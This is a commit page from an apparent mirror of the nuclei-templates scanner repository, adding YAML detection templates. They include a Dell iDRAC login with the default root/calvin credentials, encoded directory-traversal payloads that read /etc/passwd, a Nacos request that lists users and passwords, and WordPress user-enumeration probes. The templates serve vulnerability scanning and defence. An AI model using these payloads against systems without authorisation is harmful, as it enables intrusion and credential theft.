daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #19 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-02-26 23:54:55 +05:30 committed by GitHub
parent acd1ab4735 1ba9f0d33d
commit cbf9e05e26
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
15 changed files with 238 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 |
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
| workflows | 21 | miscellaneous | 14 | default-logins | 11 |
| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 |
| exposures | 55 | technologies | 48 | misconfiguration | 48 |
| workflows | 22 | miscellaneous | 15 | default-logins | 12 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**62 directories, 604 files**.
**63 directories, 612 files**.
</td>
</tr>

27
default-logins/dell/dell-idrac-default-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: dell-idrac-default-login
info:
name: Dll iDRAC Default login
author: kophjager007
severity: high
tags: dell,idrac,dlogin
requests:
- method: POST
cookie-reuse: true
path:
- "{{BaseURL}}/data/login"
body: "user=root&password=calvin"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencode
Referer: "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <authResult>0</authResult>

7
fuzzing/directory-traversal.yaml
View File

@ -24,6 +24,13 @@ requests:
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: status

29
miscellaneous/joomla-htaccess.yaml Normal file
View File

@ -0,0 +1,29 @@
id: joomla-htaccess-file
info:
name: Joomla htaccess file disclosure
author: oppsec
severity: info
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
requests:
- method: GET
path:
- "{{BaseURL}}/htaccess.txt"
matchers-condition: and
matchers:
- type: word
words:
- "# @package Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

29
miscellaneous/joomla-manifest-file.yaml Normal file
View File

@ -0,0 +1,29 @@
id: joomla-manifest-file
info:
name: Joomla manifest file disclosure
author: oppsec
severity: info
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/manifests/files/joomla.xml"
matchers-condition: and
matchers:
- type: word
words:
- "admin@joomla.org"
- "www.joomla.org"
condition: and
- type: word
words:
- "application/xml"
part: header
- type: status
status:
- 200

10
misconfiguration/unauthenticated-airflow.yaml
View File

@ -14,9 +14,15 @@ requests:
matchers:
- type: word
words:
- Airflow - DAGs
- "Content-Type: text/html"
part: header
- type: word
words:
- "<title>Airflow - DAGs</title>"
part: body
condition: and
- type: status
status:
- 200
- 200

30
misconfiguration/unauthenticated-nacos-access.yaml
View File

@ -1,30 +1,34 @@
id: unauthenticated-nacos-access
info:
name: Unauthenticated Nacos access
author: taielab
name: Unauthenticated Nacos access v1.x
author: taielab & @pikpikcu
severity: critical
# References:
# - https://github.com/alibaba/nacos/issues/4593
issues: https://github.com/alibaba/nacos/issues/4593
requests:
- raw:
- |
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Length: 2
- method: GET
path:
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
headers:
User-Agent: Nacos-Server
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: application/json"
part: header
- type: regex
regex:
- '"username":'
- '"password":'
- '"totalCount":'
condition: and
part: body
condition: and
- type: status
status:
- 200

44
technologies/dell-idrac-detect.yaml Normal file
View File

@ -0,0 +1,44 @@
id: dell-idrac-detect
info:
name: Detect Dell iDRAC
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
requests:
- method: GET
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
path:
- "{{BaseURL}}/restgui/start.html"
- "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9)
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "Dell Integrated Remote Access Controller "
- "Integrated Dell Remote Access Controller"
- "iDRAC"
- "PowerEdge"
extractors:
- type: regex
part: header
regex:
- iDRAC/[0-9]{1,2}
- type: regex
part: body
regex:
- iDRAC[0-9]{1,2}
- type: regex
part: body
name: fwver
group: 1
regex:
- '"FwVer" *: *"([^"]+)"'

25
technologies/gunicorn-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: gunicorn-detect
info:
name: Detect Gunicorn Server
author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- gunicorn+
extractors:
- type: kval
part: header
kval:
- Server

3
vulnerabilities/generic/open-redirect.yaml
View File

@ -20,7 +20,6 @@ requests:
- '{{BaseURL}}//example.com/..;/css'
- '{{BaseURL}}/example%E3%80%82com'
- '{{BaseURL}}/%5Cexample.com'
- '{{BaseURL}}example.com'
- '{{BaseURL}}/example.com'
- '{{BaseURL}}\example.com'
- '{{BaseURL}}//example.com/'
@ -46,5 +45,5 @@ requests:
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$'
part: header

3
vulnerabilities/wordpress/wordpress-user-enumeration.yaml
View File

@ -2,7 +2,7 @@ id: wordpress-user-enumeration
info:
name: Wordpress user enumeration
author: Manas_Harsh
author: Manas_Harsh & daffainfo
severity: info
tags: wordpress
@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
matchers-condition: and
matchers:
- type: status

2
miscellaneous/wp-license.yaml → vulnerabilities/wordpress/wp-license-file.yaml
View File

@ -1,4 +1,4 @@
id: wp-license
id: wp-license-file
info:
name: WordPress license file disclosure

31
vulnerabilities/wordpress/wp-uploads-listing.yaml Normal file
View File

@ -0,0 +1,31 @@
id: wp-uploads-listing
info:
name: WordPress Upload Directory Listing Enable
author: yashgoti
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/"
- "{{BaseURL}}/wp-content/uploads/2015/"
- "{{BaseURL}}/wp-content/uploads/2016/"
- "{{BaseURL}}/wp-content/uploads/2017/"
- "{{BaseURL}}/wp-content/uploads/2018/"
- "{{BaseURL}}/wp-content/uploads/2019/"
- "{{BaseURL}}/wp-content/uploads/2020/"
- "{{BaseURL}}/wp-content/uploads/2021/"
- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
matchers-condition: and
matchers:
- type: word
words:
- "Directory listing for"
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
- type: status
status:
- 200

11
workflows/dell-idrac-workflow.yaml Normal file
View File

@ -0,0 +1,11 @@
id: dell-idrac-workflow
info:
name: Dell iDRAC Security Checks
author: kophjager007
description: A workflow to identify Dell iDRAC instances and run all related nuclei templates.
tags: workflow
workflows:
- template: technologies/dell-idrac-detect.yaml
subtemplates:
- template: default-logins/dell/dell-idrac-default-login.yaml

2
workflows/wordpress-workflow.yaml
View File

@ -44,3 +44,5 @@ workflows:
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml